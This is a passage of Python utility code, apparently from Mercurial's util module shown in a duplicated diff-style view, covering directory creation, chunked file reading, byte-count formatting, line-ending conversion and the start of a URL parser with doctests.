2258 makedir(name, notindexed)
2258 makedir(name, notindexed)
2259 except OSError as err:
2259 except OSError as err:
2260 if err.errno == errno.EEXIST:
2260 if err.errno == errno.EEXIST:
2261 return
2261 return
2262 if err.errno != errno.ENOENT or not name:
2262 if err.errno != errno.ENOENT or not name:
2263 raise
2263 raise
2264 parent = os.path.dirname(os.path.abspath(name))
2264 parent = os.path.dirname(os.path.abspath(name))
2265 if parent == name:
2265 if parent == name:
2266 raise
2266 raise
2267 makedirs(parent, mode, notindexed)
2267 makedirs(parent, mode, notindexed)
2268 try:
2268 try:
2269 makedir(name, notindexed)
2269 makedir(name, notindexed)
2270 except OSError as err:
2270 except OSError as err:
2271 # Catch EEXIST to handle races
2271 # Catch EEXIST to handle races
2272 if err.errno == errno.EEXIST:
2272 if err.errno == errno.EEXIST:
2273 return
2273 return
2274 raise
2274 raise
2275 if mode is not None:
2275 if mode is not None:
2276 os.chmod(name, mode)
2276 os.chmod(name, mode)
2277
2277
2278 def readfile(path):
2278 def readfile(path):
2279 with open(path, 'rb') as fp:
2279 with open(path, 'rb') as fp:
2280 return fp.read()
2280 return fp.read()
2281
2281
2282 def writefile(path, text):
2282 def writefile(path, text):
2283 with open(path, 'wb') as fp:
2283 with open(path, 'wb') as fp:
2284 fp.write(text)
2284 fp.write(text)
2285
2285
2286 def appendfile(path, text):
2286 def appendfile(path, text):
2287 with open(path, 'ab') as fp:
2287 with open(path, 'ab') as fp:
2288 fp.write(text)
2288 fp.write(text)
2289
2289
2290 class chunkbuffer(object):
2290 class chunkbuffer(object):
2291 """Allow arbitrary sized chunks of data to be efficiently read from an
2291 """Allow arbitrary sized chunks of data to be efficiently read from an
2292 iterator over chunks of arbitrary size."""
2292 iterator over chunks of arbitrary size."""
2293
2293
2294 def __init__(self, in_iter):
2294 def __init__(self, in_iter):
2295 """in_iter is the iterator that's iterating over the input chunks."""
2295 """in_iter is the iterator that's iterating over the input chunks."""
2296 def splitbig(chunks):
2296 def splitbig(chunks):
2297 for chunk in chunks:
2297 for chunk in chunks:
2298 if len(chunk) > 2**20:
2298 if len(chunk) > 2**20:
2299 pos = 0
2299 pos = 0
2300 while pos < len(chunk):
2300 while pos < len(chunk):
2301 end = pos + 2 ** 18
2301 end = pos + 2 ** 18
2302 yield chunk[pos:end]
2302 yield chunk[pos:end]
2303 pos = end
2303 pos = end
2304 else:
2304 else:
2305 yield chunk
2305 yield chunk
2306 self.iter = splitbig(in_iter)
2306 self.iter = splitbig(in_iter)
2307 self._queue = collections.deque()
2307 self._queue = collections.deque()
2308 self._chunkoffset = 0
2308 self._chunkoffset = 0
2309
2309
2310 def read(self, l=None):
2310 def read(self, l=None):
2311 """Read L bytes of data from the iterator of chunks of data.
2311 """Read L bytes of data from the iterator of chunks of data.
2312 Returns less than L bytes if the iterator runs dry.
2312 Returns less than L bytes if the iterator runs dry.
2313
2313
2314 If size parameter is omitted, read everything"""
2314 If size parameter is omitted, read everything"""
2315 if l is None:
2315 if l is None:
2316 return ''.join(self.iter)
2316 return ''.join(self.iter)
2317
2317
2318 left = l
2318 left = l
2319 buf = []
2319 buf = []
2320 queue = self._queue
2320 queue = self._queue
2321 while left > 0:
2321 while left > 0:
2322 # refill the queue
2322 # refill the queue
2323 if not queue:
2323 if not queue:
2324 target = 2**18
2324 target = 2**18
2325 for chunk in self.iter:
2325 for chunk in self.iter:
2326 queue.append(chunk)
2326 queue.append(chunk)
2327 target -= len(chunk)
2327 target -= len(chunk)
2328 if target <= 0:
2328 if target <= 0:
2329 break
2329 break
2330 if not queue:
2330 if not queue:
2331 break
2331 break
2332
2332
2333 # The easy way to do this would be to queue.popleft(), modify the
2333 # The easy way to do this would be to queue.popleft(), modify the
2334 # chunk (if necessary), then queue.appendleft(). However, for cases
2334 # chunk (if necessary), then queue.appendleft(). However, for cases
2335 # where we read partial chunk content, this incurs 2 dequeue
2335 # where we read partial chunk content, this incurs 2 dequeue
2336 # mutations and creates a new str for the remaining chunk in the
2336 # mutations and creates a new str for the remaining chunk in the
2337 # queue. Our code below avoids this overhead.
2337 # queue. Our code below avoids this overhead.
2338
2338
2339 chunk = queue[0]
2339 chunk = queue[0]
2340 chunkl = len(chunk)
2340 chunkl = len(chunk)
2341 offset = self._chunkoffset
2341 offset = self._chunkoffset
2342
2342
2343 # Use full chunk.
2343 # Use full chunk.
2344 if offset == 0 and left >= chunkl:
2344 if offset == 0 and left >= chunkl:
2345 left -= chunkl
2345 left -= chunkl
2346 queue.popleft()
2346 queue.popleft()
2347 buf.append(chunk)
2347 buf.append(chunk)
2348 # self._chunkoffset remains at 0.
2348 # self._chunkoffset remains at 0.
2349 continue
2349 continue
2350
2350
2351 chunkremaining = chunkl - offset
2351 chunkremaining = chunkl - offset
2352
2352
2353 # Use all of unconsumed part of chunk.
2353 # Use all of unconsumed part of chunk.
2354 if left >= chunkremaining:
2354 if left >= chunkremaining:
2355 left -= chunkremaining
2355 left -= chunkremaining
2356 queue.popleft()
2356 queue.popleft()
2357 # offset == 0 is enabled by block above, so this won't merely
2357 # offset == 0 is enabled by block above, so this won't merely
2358 # copy via ``chunk[0:]``.
2358 # copy via ``chunk[0:]``.
2359 buf.append(chunk[offset:])
2359 buf.append(chunk[offset:])
2360 self._chunkoffset = 0
2360 self._chunkoffset = 0
2361
2361
2362 # Partial chunk needed.
2362 # Partial chunk needed.
2363 else:
2363 else:
2364 buf.append(chunk[offset:offset + left])
2364 buf.append(chunk[offset:offset + left])
2365 self._chunkoffset += left
2365 self._chunkoffset += left
2366 left -= chunkremaining
2366 left -= chunkremaining
2367
2367
2368 return ''.join(buf)
2368 return ''.join(buf)
2369
2369
2370 def filechunkiter(f, size=131072, limit=None):
2370 def filechunkiter(f, size=131072, limit=None):
2371 """Create a generator that produces the data in the file size
2371 """Create a generator that produces the data in the file size
2372 (default 131072) bytes at a time, up to optional limit (default is
2372 (default 131072) bytes at a time, up to optional limit (default is
2373 to read all data). Chunks may be less than size bytes if the
2373 to read all data). Chunks may be less than size bytes if the
2374 chunk is the last chunk in the file, or the file is a socket or
2374 chunk is the last chunk in the file, or the file is a socket or
2375 some other type of file that sometimes reads less data than is
2375 some other type of file that sometimes reads less data than is
2376 requested."""
2376 requested."""
2377 assert size >= 0
2377 assert size >= 0
2378 assert limit is None or limit >= 0
2378 assert limit is None or limit >= 0
2379 while True:
2379 while True:
2380 if limit is None:
2380 if limit is None:
2381 nbytes = size
2381 nbytes = size
2382 else:
2382 else:
2383 nbytes = min(limit, size)
2383 nbytes = min(limit, size)
2384 s = nbytes and f.read(nbytes)
2384 s = nbytes and f.read(nbytes)
2385 if not s:
2385 if not s:
2386 break
2386 break
2387 if limit:
2387 if limit:
2388 limit -= len(s)
2388 limit -= len(s)
2389 yield s
2389 yield s
2390
2390
2391 class cappedreader(object):
2391 class cappedreader(object):
2392 """A file object proxy that allows reading up to N bytes.
2392 """A file object proxy that allows reading up to N bytes.
2393
2393
2394 Given a source file object, instances of this type allow reading up to
2394 Given a source file object, instances of this type allow reading up to
2395 N bytes from that source file object. Attempts to read past the allowed
2395 N bytes from that source file object. Attempts to read past the allowed
2396 limit are treated as EOF.
2396 limit are treated as EOF.
2397
2397
2398 It is assumed that I/O is not performed on the original file object
2398 It is assumed that I/O is not performed on the original file object
2399 in addition to I/O that is performed by this instance. If there is,
2399 in addition to I/O that is performed by this instance. If there is,
2400 state tracking will get out of sync and unexpected results will ensue.
2400 state tracking will get out of sync and unexpected results will ensue.
2401 """
2401 """
2402 def __init__(self, fh, limit):
2402 def __init__(self, fh, limit):
2403 """Allow reading up to <limit> bytes from <fh>."""
2403 """Allow reading up to <limit> bytes from <fh>."""
2404 self._fh = fh
2404 self._fh = fh
2405 self._left = limit
2405 self._left = limit
2406
2406
2407 def read(self, n=-1):
2407 def read(self, n=-1):
2408 if not self._left:
2408 if not self._left:
2409 return b''
2409 return b''
2410
2410
2411 if n < 0:
2411 if n < 0:
2412 n = self._left
2412 n = self._left
2413
2413
2414 data = self._fh.read(min(n, self._left))
2414 data = self._fh.read(min(n, self._left))
2415 self._left -= len(data)
2415 self._left -= len(data)
2416 assert self._left >= 0
2416 assert self._left >= 0
2417
2417
2418 return data
2418 return data
2419
2419
2420 def readinto(self, b):
2420 def readinto(self, b):
2421 res = self.read(len(b))
2421 res = self.read(len(b))
2422 if res is None:
2422 if res is None:
2423 return None
2423 return None
2424
2424
2425 b[0:len(res)] = res
2425 b[0:len(res)] = res
2426 return len(res)
2426 return len(res)
2427
2427
2428 def unitcountfn(*unittable):
2428 def unitcountfn(*unittable):
2429 '''return a function that renders a readable count of some quantity'''
2429 '''return a function that renders a readable count of some quantity'''
2430
2430
2431 def go(count):
2431 def go(count):
2432 for multiplier, divisor, format in unittable:
2432 for multiplier, divisor, format in unittable:
2433 if abs(count) >= divisor * multiplier:
2433 if abs(count) >= divisor * multiplier:
2434 return format % (count / float(divisor))
2434 return format % (count / float(divisor))
2435 return unittable[-1][2] % count
2435 return unittable[-1][2] % count
2436
2436
2437 return go
2437 return go
2438
2438
2439 def processlinerange(fromline, toline):
2439 def processlinerange(fromline, toline):
2440 """Check that linerange <fromline>:<toline> makes sense and return a
2440 """Check that linerange <fromline>:<toline> makes sense and return a
2441 0-based range.
2441 0-based range.
2442
2442
2443 >>> processlinerange(10, 20)
2443 >>> processlinerange(10, 20)
2444 (9, 20)
2444 (9, 20)
2445 >>> processlinerange(2, 1)
2445 >>> processlinerange(2, 1)
2446 Traceback (most recent call last):
2446 Traceback (most recent call last):
2447 ...
2447 ...
2448 ParseError: line range must be positive
2448 ParseError: line range must be positive
2449 >>> processlinerange(0, 5)
2449 >>> processlinerange(0, 5)
2450 Traceback (most recent call last):
2450 Traceback (most recent call last):
2451 ...
2451 ...
2452 ParseError: fromline must be strictly positive
2452 ParseError: fromline must be strictly positive
2453 """
2453 """
2454 if toline - fromline < 0:
2454 if toline - fromline < 0:
2455 raise error.ParseError(_("line range must be positive"))
2455 raise error.ParseError(_("line range must be positive"))
2456 if fromline < 1:
2456 if fromline < 1:
2457 raise error.ParseError(_("fromline must be strictly positive"))
2457 raise error.ParseError(_("fromline must be strictly positive"))
2458 return fromline - 1, toline
2458 return fromline - 1, toline
2459
2459
2460 bytecount = unitcountfn(
2460 bytecount = unitcountfn(
2461 (100, 1 << 30, _('%.0f GB')),
2461 (100, 1 << 30, _('%.0f GB')),
2462 (10, 1 << 30, _('%.1f GB')),
2462 (10, 1 << 30, _('%.1f GB')),
2463 (1, 1 << 30, _('%.2f GB')),
2463 (1, 1 << 30, _('%.2f GB')),
2464 (100, 1 << 20, _('%.0f MB')),
2464 (100, 1 << 20, _('%.0f MB')),
2465 (10, 1 << 20, _('%.1f MB')),
2465 (10, 1 << 20, _('%.1f MB')),
2466 (1, 1 << 20, _('%.2f MB')),
2466 (1, 1 << 20, _('%.2f MB')),
2467 (100, 1 << 10, _('%.0f KB')),
2467 (100, 1 << 10, _('%.0f KB')),
2468 (10, 1 << 10, _('%.1f KB')),
2468 (10, 1 << 10, _('%.1f KB')),
2469 (1, 1 << 10, _('%.2f KB')),
2469 (1, 1 << 10, _('%.2f KB')),
2470 (1, 1, _('%.0f bytes')),
2470 (1, 1, _('%.0f bytes')),
2471 )
2471 )
2472
2472
2473 class transformingwriter(object):
2473 class transformingwriter(object):
2474 """Writable file wrapper to transform data by function"""
2474 """Writable file wrapper to transform data by function"""
2475
2475
2476 def __init__(self, fp, encode):
2476 def __init__(self, fp, encode):
2477 self._fp = fp
2477 self._fp = fp
2478 self._encode = encode
2478 self._encode = encode
2479
2479
2480 def close(self):
2480 def close(self):
2481 self._fp.close()
2481 self._fp.close()
2482
2482
2483 def flush(self):
2483 def flush(self):
2484 self._fp.flush()
2484 self._fp.flush()
2485
2485
2486 def write(self, data):
2486 def write(self, data):
2487 return self._fp.write(self._encode(data))
2487 return self._fp.write(self._encode(data))
2488
2488
2489 # Matches a single EOL which can either be a CRLF where repeated CR
2489 # Matches a single EOL which can either be a CRLF where repeated CR
2490 # are removed or a LF. We do not care about old Macintosh files, so a
2490 # are removed or a LF. We do not care about old Macintosh files, so a
2491 # stray CR is an error.
2491 # stray CR is an error.
2492 _eolre = remod.compile(br'\r*\n')
2492 _eolre = remod.compile(br'\r*\n')
2493
2493
2494 def tolf(s):
2494 def tolf(s):
2495 return _eolre.sub('\n', s)
2495 return _eolre.sub('\n', s)
2496
2496
2497 def tocrlf(s):
2497 def tocrlf(s):
2498 return _eolre.sub('\r\n', s)
2498 return _eolre.sub('\r\n', s)
2499
2499
2500 def _crlfwriter(fp):
2500 def _crlfwriter(fp):
2501 return transformingwriter(fp, tocrlf)
2501 return transformingwriter(fp, tocrlf)
2502
2502
2503 if pycompat.oslinesep == '\r\n':
2503 if pycompat.oslinesep == '\r\n':
2504 tonativeeol = tocrlf
2504 tonativeeol = tocrlf
2505 fromnativeeol = tolf
2505 fromnativeeol = tolf
2506 nativeeolwriter = _crlfwriter
2506 nativeeolwriter = _crlfwriter
2507 else:
2507 else:
2508 tonativeeol = pycompat.identity
2508 tonativeeol = pycompat.identity
2509 fromnativeeol = pycompat.identity
2509 fromnativeeol = pycompat.identity
2510 nativeeolwriter = pycompat.identity
2510 nativeeolwriter = pycompat.identity
2511
2511
2512 if (pyplatform.python_implementation() == 'CPython' and
2512 if (pyplatform.python_implementation() == 'CPython' and
2513 sys.version_info < (3, 0)):
2513 sys.version_info < (3, 0)):
2514 # There is an issue in CPython that some IO methods do not handle EINTR
2514 # There is an issue in CPython that some IO methods do not handle EINTR
2515 # correctly. The following table shows what CPython version (and functions)
2515 # correctly. The following table shows what CPython version (and functions)
2516 # are affected (buggy: has the EINTR bug, okay: otherwise):
2516 # are affected (buggy: has the EINTR bug, okay: otherwise):
2517 #
2517 #
2518 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2518 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2519 # --------------------------------------------------
2519 # --------------------------------------------------
2520 # fp.__iter__ | buggy | buggy | okay
2520 # fp.__iter__ | buggy | buggy | okay
2521 # fp.read* | buggy | okay [1] | okay
2521 # fp.read* | buggy | okay [1] | okay
2522 #
2522 #
2523 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2523 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2524 #
2524 #
2525 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2525 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2526 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2526 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2527 #
2527 #
2528 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2528 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2529 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2529 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2530 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2530 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2531 # fp.__iter__ but not other fp.read* methods.
2531 # fp.__iter__ but not other fp.read* methods.
2532 #
2532 #
2533 # On modern systems like Linux, the "read" syscall cannot be interrupted
2533 # On modern systems like Linux, the "read" syscall cannot be interrupted
2534 # when reading "fast" files like on-disk files. So the EINTR issue only
2534 # when reading "fast" files like on-disk files. So the EINTR issue only
2535 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2535 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2536 # files approximately as "fast" files and use the fast (unsafe) code path,
2536 # files approximately as "fast" files and use the fast (unsafe) code path,
2537 # to minimize the performance impact.
2537 # to minimize the performance impact.
2538 if sys.version_info >= (2, 7, 4):
2538 if sys.version_info >= (2, 7, 4):
2539 # fp.readline deals with EINTR correctly, use it as a workaround.
2539 # fp.readline deals with EINTR correctly, use it as a workaround.
2540 def _safeiterfile(fp):
2540 def _safeiterfile(fp):
2541 return iter(fp.readline, '')
2541 return iter(fp.readline, '')
2542 else:
2542 else:
2543 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2543 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2544 # note: this may block longer than necessary because of bufsize.
2544 # note: this may block longer than necessary because of bufsize.
2545 def _safeiterfile(fp, bufsize=4096):
2545 def _safeiterfile(fp, bufsize=4096):
2546 fd = fp.fileno()
2546 fd = fp.fileno()
2547 line = ''
2547 line = ''
2548 while True:
2548 while True:
2549 try:
2549 try:
2550 buf = os.read(fd, bufsize)
2550 buf = os.read(fd, bufsize)
2551 except OSError as ex:
2551 except OSError as ex:
2552 # os.read only raises EINTR before any data is read
2552 # os.read only raises EINTR before any data is read
2553 if ex.errno == errno.EINTR:
2553 if ex.errno == errno.EINTR:
2554 continue
2554 continue
2555 else:
2555 else:
2556 raise
2556 raise
2557 line += buf
2557 line += buf
2558 if '\n' in buf:
2558 if '\n' in buf:
2559 splitted = line.splitlines(True)
2559 splitted = line.splitlines(True)
2560 line = ''
2560 line = ''
2561 for l in splitted:
2561 for l in splitted:
2562 if l[-1] == '\n':
2562 if l[-1] == '\n':
2563 yield l
2563 yield l
2564 else:
2564 else:
2565 line = l
2565 line = l
2566 if not buf:
2566 if not buf:
2567 break
2567 break
2568 if line:
2568 if line:
2569 yield line
2569 yield line
2570
2570
2571 def iterfile(fp):
2571 def iterfile(fp):
2572 fastpath = True
2572 fastpath = True
2573 if type(fp) is file:
2573 if type(fp) is file:
2574 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2574 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2575 if fastpath:
2575 if fastpath:
2576 return fp
2576 return fp
2577 else:
2577 else:
2578 return _safeiterfile(fp)
2578 return _safeiterfile(fp)
2579 else:
2579 else:
2580 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2580 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2581 def iterfile(fp):
2581 def iterfile(fp):
2582 return fp
2582 return fp
2583
2583
2584 def iterlines(iterator):
2584 def iterlines(iterator):
2585 for chunk in iterator:
2585 for chunk in iterator:
2586 for line in chunk.splitlines():
2586 for line in chunk.splitlines():
2587 yield line
2587 yield line
2588
2588
2589 def expandpath(path):
2589 def expandpath(path):
2590 return os.path.expanduser(os.path.expandvars(path))
2590 return os.path.expanduser(os.path.expandvars(path))
2591
2591
2592 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2592 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2593 """Return the result of interpolating items in the mapping into string s.
2593 """Return the result of interpolating items in the mapping into string s.
2594
2594
2595 prefix is a single character string, or a two character string with
2595 prefix is a single character string, or a two character string with
2596 a backslash as the first character if the prefix needs to be escaped in
2596 a backslash as the first character if the prefix needs to be escaped in
2597 a regular expression.
2597 a regular expression.
2598
2598
2599 fn is an optional function that will be applied to the replacement text
2599 fn is an optional function that will be applied to the replacement text
2600 just before replacement.
2600 just before replacement.
2601
2601
2602 escape_prefix is an optional flag that allows using doubled prefix for
2602 escape_prefix is an optional flag that allows using doubled prefix for
2603 its escaping.
2603 its escaping.
2604 """
2604 """
2605 fn = fn or (lambda s: s)
2605 fn = fn or (lambda s: s)
2606 patterns = '|'.join(mapping.keys())
2606 patterns = '|'.join(mapping.keys())
2607 if escape_prefix:
2607 if escape_prefix:
2608 patterns += '|' + prefix
2608 patterns += '|' + prefix
2609 if len(prefix) > 1:
2609 if len(prefix) > 1:
2610 prefix_char = prefix[1:]
2610 prefix_char = prefix[1:]
2611 else:
2611 else:
2612 prefix_char = prefix
2612 prefix_char = prefix
2613 mapping[prefix_char] = prefix_char
2613 mapping[prefix_char] = prefix_char
2614 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2614 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2615 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2615 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2616
2616
2617 def getport(port):
2617 def getport(port):
2618 """Return the port for a given network service.
2618 """Return the port for a given network service.
2619
2619
2620 If port is an integer, it's returned as is. If it's a string, it's
2620 If port is an integer, it's returned as is. If it's a string, it's
2621 looked up using socket.getservbyname(). If there's no matching
2621 looked up using socket.getservbyname(). If there's no matching
2622 service, error.Abort is raised.
2622 service, error.Abort is raised.
2623 """
2623 """
2624 try:
2624 try:
2625 return int(port)
2625 return int(port)
2626 except ValueError:
2626 except ValueError:
2627 pass
2627 pass
2628
2628
2629 try:
2629 try:
2630 return socket.getservbyname(pycompat.sysstr(port))
2630 return socket.getservbyname(pycompat.sysstr(port))
2631 except socket.error:
2631 except socket.error:
2632 raise error.Abort(_("no port number associated with service '%s'")
2632 raise error.Abort(_("no port number associated with service '%s'")
2633 % port)
2633 % port)
2634
2634
2635 class url(object):
2635 class url(object):
2636 r"""Reliable URL parser.
2636 r"""Reliable URL parser.
2637
2637
2638 This parses URLs and provides attributes for the following
2638 This parses URLs and provides attributes for the following
2639 components:
2639 components:
2640
2640
2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2642
2642
2643 Missing components are set to None. The only exception is
2643 Missing components are set to None. The only exception is
2644 fragment, which is set to '' if present but empty.
2644 fragment, which is set to '' if present but empty.
2645
2645
2646 If parsefragment is False, fragment is included in query. If
2646 If parsefragment is False, fragment is included in query. If
2647 parsequery is False, query is included in path. If both are
2647 parsequery is False, query is included in path. If both are
2648 False, both fragment and query are included in path.
2648 False, both fragment and query are included in path.
2649
2649
2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2651
2651
2652 Note that for backward compatibility reasons, bundle URLs do not
2652 Note that for backward compatibility reasons, bundle URLs do not
2653 take host names. That means 'bundle://../' has a path of '../'.
2653 take host names. That means 'bundle://../' has a path of '../'.
2654
2654
2655 Examples:
2655 Examples:
2656
2656
2657 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2657 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2659 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2659 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2661 >>> url(b'file:///home/joe/repo')
2661 >>> url(b'file:///home/joe/repo')
2662 <url scheme: 'file', path: '/home/joe/repo'>
2662 <url scheme: 'file', path: '/home/joe/repo'>
2663 >>> url(b'file:///c:/temp/foo/')
2663 >>> url(b'file:///c:/temp/foo/')
2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2665 >>> url(b'bundle:foo')
2665 >>> url(b'bundle:foo')
2666 <url scheme: 'bundle', path: 'foo'>
2666 <url scheme: 'bundle', path: 'foo'>
2667 >>> url(b'bundle://../foo')
2667 >>> url(b'bundle://../foo')
2668 <url scheme: 'bundle', path: '../foo'>
2668 <url scheme: 'bundle', path: '../foo'>
2669 >>> url(br'c:\foo\bar')
2669 >>> url(br'c:\foo\bar')
2670 <url path: 'c:\\foo\\bar'>
2670 <url path: 'c:\\foo\\bar'>
2671 >>> url(br'\\blah\blah\blah')
2671 >>> url(br'\\blah\blah\blah')
2672 <url path: '\\\\blah\\blah\\blah'>
2672 <url path: '\\\\blah\\blah\\blah'>
2673 >>> url(br'\\blah\blah\blah#baz')
2673 >>> url(br'\\blah\blah\blah#baz')
2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2675 >>> url(br'file:///C:\users\me')
2675 >>> url(br'file:///C:\users\me')
2676 <url scheme: 'file', path: 'C:\\users\\me'>
2676 <url scheme: 'file', path: 'C:\\users\\me'>
2677
2677
2678 Authentication credentials:
2678 Authentication credentials:
2679
2679
2680 >>> url(b'ssh://joe:xyz@x/repo')
2680 >>> url(b'ssh://joe:xyz@x/repo')
2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2682 >>> url(b'ssh://joe@x/repo')
2682 >>> url(b'ssh://joe@x/repo')
2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2684
2684
2685 Query strings and fragments:
2685 Query strings and fragments:
2686
2686
2687 >>> url(b'http://host/a?b#c')
2687 >>> url(b'http://host/a?b#c')
2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2689 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2689 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2691
2691
2692 Empty path:
2692 Empty path:
2693
2693
2694 >>> url(b'')
2694 >>> url(b'')
2695 <url path: ''>
2695 <url path: ''>
2696 >>> url(b'#a')
2696 >>> url(b'#a')
2697 <url path: '', fragment: 'a'>
2697 <url path: '', fragment: 'a'>
2698 >>> url(b'http://host/')
2698 >>> url(b'http://host/')
2699 <url scheme: 'http', host: 'host', path: ''>
2699 <url scheme: 'http', host: 'host', path: ''>
2700 >>> url(b'http://host/#a')
2700 >>> url(b'http://host/#a')
2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2702
2702
2703 Only scheme:
2703 Only scheme:
2704
2704
2705 >>> url(b'http:')
2705 >>> url(b'http:')
2706 <url scheme: 'http'>
2706 <url scheme: 'http'>
2707 """
2707 """
2708
2708
2709 _safechars = "!~*'()+"
2709 _safechars = "!~*'()+"
2710 _safepchars = "/!~*'()+:\\"
2710 _safepchars = "/!~*'()+:\\"
2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2712
2712
2713 def __init__(self, path, parsequery=True, parsefragment=True):
2713 def __init__(self, path, parsequery=True, parsefragment=True):
2714 # We slowly chomp away at path until we have only the path left
2714 # We slowly chomp away at path until we have only the path left
2715 self.scheme = self.user = self.passwd = self.host = None
2715 self.scheme = self.user = self.passwd = self.host = None
2716 self.port = self.path = self.query = self.fragment = None
2716 self.port = self.path = self.query = self.fragment = None
2717 self._localpath = True
2717 self._localpath = True
2718 self._hostport = ''
2718 self._hostport = ''
2719 self._origpath = path
2719 self._origpath = path
2720
2720
2721 if parsefragment and '#' in path:
2721 if parsefragment and '#' in path:
2722 path, self.fragment = path.split('#', 1)
2722 path, self.fragment = path.split('#', 1)
2723
2723
2724 # special case for Windows drive letters and UNC paths
2724 # special case for Windows drive letters and UNC paths
2725 if hasdriveletter(path) or path.startswith('\\\\'):
2725 if hasdriveletter(path) or path.startswith('\\\\'):
2726 self.path = path
2726 self.path = path
2727 return
2727 return
2728
2728
2729 # For compatibility reasons, we can't handle bundle paths as
2729 # For compatibility reasons, we can't handle bundle paths as
2730 # normal URLS
2730 # normal URLS
2731 if path.startswith('bundle:'):
2731 if path.startswith('bundle:'):
2732 self.scheme = 'bundle'
2732 self.scheme = 'bundle'
2733 path = path[7:]
2733 path = path[7:]
2734 if path.startswith('//'):
2734 if path.startswith('//'):
2735 path = path[2:]
2735 path = path[2:]
2736 self.path = path
2736 self.path = path
2737 return
2737 return
2738
2738
2739 if self._matchscheme(path):
2739 if self._matchscheme(path):
2740 parts = path.split(':', 1)
2740 parts = path.split(':', 1)
2741 if parts[0]:
2741 if parts[0]:
2742 self.scheme, path = parts
2742 self.scheme, path = parts
2743 self._localpath = False
2743 self._localpath = False
2744
2744
2745 if not path:
2745 if not path:
2746 path = None
2746 path = None
2747 if self._localpath:
2747 if self._localpath:
2748 self.path = ''
2748 self.path = ''
2749 return
2749 return
2750 else:
2750 else:
2751 if self._localpath:
2751 if self._localpath:
2752 self.path = path
2752 self.path = path
2753 return
2753 return
2754
2754
2755 if parsequery and '?' in path:
2755 if parsequery and '?' in path:
2756 path, self.query = path.split('?', 1)
2756 path, self.query = path.split('?', 1)
2757 if not path:
2757 if not path:
2758 path = None
2758 path = None
2759 if not self.query:
2759 if not self.query:
2760 self.query = None
2760 self.query = None
2761
2761
2762 # // is required to specify a host/authority
2762 # // is required to specify a host/authority
2763 if path and path.startswith('//'):
2763 if path and path.startswith('//'):
2764 parts = path[2:].split('/', 1)
2764 parts = path[2:].split('/', 1)
2765 if len(parts) > 1:
2765 if len(parts) > 1:
2766 self.host, path = parts
2766 self.host, path = parts
2767 else:
2767 else:
2768 self.host = parts[0]
2768 self.host = parts[0]
2769 path = None
2769 path = None
2770 if not self.host:
2770 if not self.host:
2771 self.host = None
2771 self.host = None
2772 # path of file:///d is /d
2772 # path of file:///d is /d
2773 # path of file:///d:/ is d:/, not /d:/
2773 # path of file:///d:/ is d:/, not /d:/
2774 if path and not hasdriveletter(path):
2774 if path and not hasdriveletter(path):
2775 path = '/' + path
2775 path = '/' + path
2776
2776
2777 if self.host and '@' in self.host:
2777 if self.host and '@' in self.host:
2778 self.user, self.host = self.host.rsplit('@', 1)
2778 self.user, self.host = self.host.rsplit('@', 1)
